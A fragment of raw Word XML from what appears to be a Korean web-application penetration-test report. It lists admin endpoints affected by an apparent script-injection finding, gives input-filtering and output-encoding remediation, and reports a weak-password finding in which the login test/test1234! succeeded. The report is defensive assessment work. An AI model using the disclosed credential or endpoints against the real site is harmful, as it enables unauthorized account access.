            <w:r w:rsidRPr="00A0642C">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>메인</w:t>
            </w:r>
            <w:r w:rsidRPr="00A0642C">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 페이지 &gt; 고객센터 &gt; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>F</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>AQ</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D168721" w14:textId="409F9D16" w:rsidR="00431EB7" w:rsidRDefault="00431EB7" w:rsidP="00AD1449">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A0642C">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/faq/openFaqWrite.do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00431EB7" w:rsidRPr="00B112DB" w14:paraId="4FA26BAA" w14:textId="77777777" w:rsidTr="00102B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39125724" w14:textId="77777777" w:rsidR="00431EB7" w:rsidRPr="00A0642C"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A5D474" w14:textId="1ADD9C18" w:rsidR="00431EB7" w:rsidRPr="00A0642C" w:rsidRDefault="00431EB7" w:rsidP="00A0642C">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관리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상품등록</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7D41E7C" w14:textId="465A3187" w:rsidR="00431EB7" w:rsidRPr="00A0642C" w:rsidRDefault="00431EB7" w:rsidP="00AD1449">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00461063">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/shop/openGoodsWrite.do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00431EB7" w:rsidRPr="00B112DB" w14:paraId="18599DCD" w14:textId="77777777" w:rsidTr="00A47F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FD6FDFA" w14:textId="77777777" w:rsidR="00431EB7" w:rsidRPr="00A0642C" w:rsidRDefault="00431EB7" w:rsidP="00102B64">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DA5947" w14:textId="66731C41" w:rsidR="00431EB7" w:rsidRPr="00102B64" w:rsidRDefault="00431EB7" w:rsidP="00102B64">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관리 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">&gt; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>쿠폰등록</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549FFA7E" w14:textId="0D2AEE66" w:rsidR="00431EB7" w:rsidRDefault="00431EB7" w:rsidP="00102B64">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00102B64">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/adminCouponWriteForm.do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00431EB7" w:rsidRPr="00B112DB" w14:paraId="408FC7F0"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bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6F72010F" w14:textId="77777777" w:rsidR="00431EB7" w:rsidRPr="00A0642C" w:rsidRDefault="00431EB7" w:rsidP="00102B64">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F8773" w14:textId="41AA0E23" w:rsidR="00431EB7" w:rsidRDefault="00431EB7" w:rsidP="00102B64">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챗봇</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1A1C08F1" w14:textId="3CD629EF" w:rsidR="00431EB7" w:rsidRPr="00102B64" w:rsidRDefault="00431EB7" w:rsidP="00102B64">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00431EB7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidR="00041DFF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>m</w:t>
            </w:r>
            <w:r w:rsidR="00041DFF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ain.do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="10A3F758" w14:textId="77777777" w:rsidR="00910D06" w:rsidRDefault="00910D06" w:rsidP="00910D06">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D54991F" w14:textId="77777777" w:rsidR="00910D06" w:rsidRPr="001E4BC6" w:rsidRDefault="00910D06" w:rsidP="00910D06"/>
    <w:p w14:paraId="31833645" w14:textId="77777777" w:rsidR="00910D06" w:rsidRDefault="00910D06" w:rsidP="00910D06">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB22A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>해결방안</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A88A4E" w14:textId="0A8E3807" w:rsidR="000B6D70" w:rsidRDefault="0035187D" w:rsidP="0020266A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">공격 구문에 자주 사용되는 태그와 특수문자들에 대한 </w:t>
      </w:r>
      <w:r w:rsidR="00E32199">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>적절한 입력값 필터링과 출력</w:t>
      </w:r>
      <w:r w:rsidR="0073501F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>값들에 대한</w:t>
      </w:r>
      <w:r w:rsidR="00E32199">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 인코딩을 적용하여,</w:t>
      </w:r>
      <w:r w:rsidR="00E32199">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E32199">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>사용자</w:t>
      </w:r>
      <w:r w:rsidR="009B324B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로</w:t>
      </w:r>
      <w:r w:rsidR="00E32199">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">부터 </w:t>
      </w:r>
      <w:r w:rsidR="009B324B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>입력받는</w:t>
      </w:r>
      <w:r w:rsidR="00E32199">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 데이터에 포함된 스크립트 및 </w:t>
      </w:r>
      <w:r w:rsidR="00E32199">
        <w:t xml:space="preserve">HTML </w:t>
      </w:r>
      <w:r w:rsidR="00E32199">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>태그가 실행되지 않도록 해야 합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E25BB6" w14:textId="77777777" w:rsidR="000B6D70" w:rsidRDefault="000B6D70">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:snapToGrid/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1BF51B" w14:textId="771E942F" w:rsidR="000B6D70" w:rsidRDefault="00B5070A" w:rsidP="000B6D70">
      <w:pPr>
        <w:pStyle w:val="Level3TitleCtl3"/>
      </w:pPr>
      <w:bookmarkStart w:id="392" w:name="_Toc209094560"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>약한 문자열 강도</w:t>
      </w:r>
      <w:bookmarkEnd w:id="392"/>
    </w:p>
    <w:p w14:paraId="5D96E825" w14:textId="77777777" w:rsidR="000B6D70" w:rsidRDefault="000B6D70" w:rsidP="000B6D70">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>개요</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0154BD65" w14:textId="28CA263F" w:rsidR="000B6D70" w:rsidRPr="00B5070A" w:rsidRDefault="00B5070A" w:rsidP="00B5070A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>유추하기</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>쉬운</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 계정 및 패스워드</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 사용</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">하면 </w:t>
      </w:r>
      <w:r w:rsidR="00BA43C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>사전 공격이나 브루트</w:t>
      </w:r>
      <w:r w:rsidR="00374F80">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BA43C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>포스 공격에 취약합니다.</w:t>
      </w:r>
      <w:r w:rsidR="00BA43C9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BA43C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">이를 통해 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>사용자</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 권한 탈취</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>의</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 위험이 존재하며, 해당 위험을 방지하기 위해 </w:t>
      </w:r>
      <w:r w:rsidR="00BA43C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>최소 길이</w:t>
      </w:r>
      <w:r w:rsidR="00BA43C9">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00BA43C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>문자 조합,</w:t>
      </w:r>
      <w:r w:rsidR="00BA43C9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BA43C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>반복 패턴 금지 등 정책을 설정해야 합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF27906" w14:textId="77777777" w:rsidR="000B6D70" w:rsidRDefault="000B6D70" w:rsidP="000B6D70">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3319B0E6" w14:textId="77777777" w:rsidR="000B6D70" w:rsidRPr="00CB22A6" w:rsidRDefault="000B6D70" w:rsidP="000B6D70">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>문제점</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA44519" w14:textId="40E3F88E" w:rsidR="000B6D70" w:rsidRPr="00CB22A6" w:rsidRDefault="000E0FBF" w:rsidP="000B6D70">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>웹 사이트 로그인 페이지의 로그인 창에 추측</w:t>
      </w:r>
      <w:r w:rsidR="003B6862">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>할 수 있는</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 계정이나 패스워드를 입력하여 정상 로그인 유무를 확인한 결과 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">test/test1234! </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>조합의 계정으로 정상 로그인이 가능하다는 것을 발견했습니다.</w:t>
      </w:r>
      <w:r w:rsidR="00140E6B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00140E6B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이는 약한 계정 및 패스워드 규칙이 적용되어 회원 계정 탈취,</w:t>
      </w:r>
      <w:r w:rsidR="00140E6B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00140E6B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>무단 접근,</w:t>
      </w:r>
      <w:r w:rsidR="00140E6B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00140E6B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>권한 탈취로 이어질 위험이 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FBDAF6" w14:textId="77777777" w:rsidR="000B6D70" w:rsidRDefault="000B6D70" w:rsidP="000B6D70">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="440BEFCD" w14:textId="044496DE" w:rsidR="000B6D70" w:rsidRPr="00CB22A6" w:rsidRDefault="00960B0E" w:rsidP="000B6D70">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251534336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="25024F44" wp14:editId="6ECA796A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3608070</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>734060</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="264795" cy="213360"/>
                <wp:effectExtent l="0" t="0" r="20955" b="15240"/>
                <wp:wrapNone/>
                <wp:docPr id="427" name="직사각형 427"/>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21F4E" id="직사각형 427" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:284.1pt;margin-top:57.8pt;width:20.85pt;height:16.8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JswIAAJU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R5RkfDY0o0q7BIj9/uH798//nj/tfXBxLukaXauAka35iFbSWHx5DyVtoq/GMyZBuZ&#10;3fXMiq0nHC+HR6PjkzElHFXDweHhUWQ+eXI21vl3AioSDhm1WLjIJ9tcOo8B0bQzCbE0zEulYvGU&#10;JjV23kk6TqOHA1XmQRvsnF0tz5UlG4b1n89T/IVkEG3PDCWl8TKk2CQVT36nRMBQ+oOQSFFIo4kQ&#10;mlP0sIxzof2gURUsF0208X6wziOGjoABWeIre+wWoLNsQDrs5s2tfXAVsbd75zb1vzn3HjEyaN87&#10;V6UG+1JmCrNqIzf2HUkNNYGlJeQ7bCALzWQ5w+clVvCSOb9gFkcJhw7Xg7/Gj1SAlYL2REkB9vNL&#10;98EeOxy1lNQ4mhl1n9bMCkrUe429fzIYjcIsR2E0Ph6iYPc1y32NXlfngNUf4CIyPB6DvVfdUVqo&#10;7nCLzEJUVDHNMXZGubedcO6blYF7iIvZLJrh/BrmL/WN4QE8sBo69HZ7x6xp29hj/19BN8Zs8qyb&#10;G9vgqWG29iDL2OpPvLZ84+zHxmn3VFgu+3K0etqm098AAAD//wMAUEsDBBQABgAIAAAAIQDqB711&#10;4AAAAAsBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/BTsMwDIbvSLxDZCRuLF3EurY0nQAJIdAOMLZ7&#10;1mRttcSpmqwtb485wdH+P/3+XG5mZ9lohtB5lLBcJMAM1l532EjYf73cZcBCVKiV9WgkfJsAm+r6&#10;qlSF9hN+mnEXG0YlGAoloY2xLzgPdWucCgvfG6Ts5AenIo1Dw/WgJip3loskSblTHdKFVvXmuTX1&#10;eXdxEj78+cTtQYj39dOrWL+5bGrGrZS3N/PjA7Bo5vgHw68+qUNFTkd/QR2YlbBKM0EoBctVCoyI&#10;NMlzYEfa3OcCeFXy/z9UPwAAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQB&#10;AAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDp+BkJswIAAJUF&#10;AAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQDqB7114AAA&#10;AAsBAAAPAAAAAAAAAAAAAAAAAA0FAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAGgYA&#10;AAAA&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7877F60B" wp14:editId="68A0B8EA">
            <wp:extent cx="4572000" cy="1922948"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="20320"/>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r="1514" b="63177"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="19229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FB5C8C" w14:textId="71137B1D" w:rsidR="000B6D70" w:rsidRDefault="000B6D70" w:rsidP="000B6D70">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:wordWrap/>
      </w:pPr>
      <w:bookmarkStart w:id="393" w:name="_Toc20909460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34</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">메인에서 </w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00960B0E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로그인</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>클릭</w:t>
      </w:r>
      <w:bookmarkEnd w:id="393"/>
    </w:p>
    <w:p w14:paraId="7E1A2EDD" w14:textId="77777777" w:rsidR="000B6D70" w:rsidRPr="00CB22A6" w:rsidRDefault="000B6D70" w:rsidP="000B6D70">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D84C37A" w14:textId="133D166C" w:rsidR="000B6D70" w:rsidRDefault="00D62C88" w:rsidP="000B6D70">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251539456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="51499F3E" wp14:editId="78E2C7F0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2023110</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1527175</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2419350" cy="576580"/>
                <wp:effectExtent l="0" t="0" r="19050" b="13970"/>
                <wp:wrapNone/>
                <wp:docPr id="446" name="직사각형 446"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2419350" cy="5765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82BC" id="직사각형 446" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:159.3pt;margin-top:120.25pt;width:190.5pt;height:45.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y5wsgIAAJYFAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1uEzEQviPxDpbvdJOQlDbqpopaBSFV&#10;bUWLena8dtaS12NsJ5twK++AxBtw4cBzofIOjL0/jUrFAZHDxuOZ+cbzzc/J6bbSZCOcV2ByOjwY&#10;UCIMh0KZVU4/3C5eHVHiAzMF02BETnfC09PZyxcntZ2KEZSgC+EIghg/rW1OyxDsNMs8L0XF/AFY&#10;YVApwVUsoOhWWeFYjeiVzkaDwWFWgyusAy68x9vzRklnCV9KwcOVlF4EonOKbwvp69J3Gb/Z7IRN&#10;V47ZUvH2GewfXlExZTBoD3XOAiNrp/6AqhR34EGGAw5VBlIqLlIOmM1w8CSbm5JZkXJBcrztafL/&#10;D5Zfbq4dUUVOx+NDSgyrsEgP3+4fPn//+eP+19cvJN4jS7X1UzS+sdeulTweY8pb6ar4j8mQbWJ2&#10;1zMrtoFwvByNh8evJ1gAjrrJm8PJUaI+e/S2zoe3AioSDzl1WLlEKNtc+IAR0bQzicEMLJTWqXra&#10;kBpb73iA+FHlQasiapPgVssz7ciGYQMsFgP8xWwQbc8MJW3wMubYZJVOYadFxNDmvZDIUcyjiRC7&#10;U/SwjHNhwrBRlawQTbTJfrDOI4VOgBFZ4it77Bags2xAOuzmza19dBWpuXvnNvW/OfceKTKY0DtX&#10;yoB7LjONWbWRG/uOpIaayNISih12kINmtLzlC4UVvGA+XDOHs4RFx/0QrvAjNWCloD1RUoL79Nx9&#10;tMcWRy0lNc5mTv3HNXOCEv3OYPMfD8fjOMxJGE/ejFBw+5rlvsasqzPA6g9xE1mejtE+6O4oHVR3&#10;uEbmMSqqmOEYO6c8uE44C83OwEXExXyezHCALQsX5sbyCB5ZjR16u71jzrZtHHAALqGbYzZ90s2N&#10;bfQ0MF8HkCq1+iOvLd84/Klx2kUVt8u+nKwe1+nsNwAAAP//AwBQSwMEFAAGAAgAAAAhAJZUyn3g&#10;AAAACwEAAA8AAABkcnMvZG93bnJldi54bWxMj8FOhDAQhu8mvkMzJt7cQlGWRcpGTYzReNBV713a&#10;BbLtlNAu4Ns7nvQ483/555tquzjLJjOG3qOEdJUAM9h43WMr4fPj8aoAFqJCraxHI+HbBNjW52eV&#10;KrWf8d1Mu9gyKsFQKgldjEPJeWg641RY+cEgZQc/OhVpHFuuRzVTubNcJEnOneqRLnRqMA+daY67&#10;k5Pw5o8Hbr+EeFnfP4n1syvmdnqV8vJiubsFFs0S/2D41Sd1qMlp70+oA7MSsrTICZUgrpMbYETk&#10;mw1t9hRlaQa8rvj/H+ofAAAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEA&#10;AAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhANAzLnCyAgAAlgUA&#10;AA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAJZUyn3gAAAA&#10;CwEAAA8AAAAAAAAAAAAAAAAADAUAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAAZBgAA&#10;AAA=&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="0006073C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
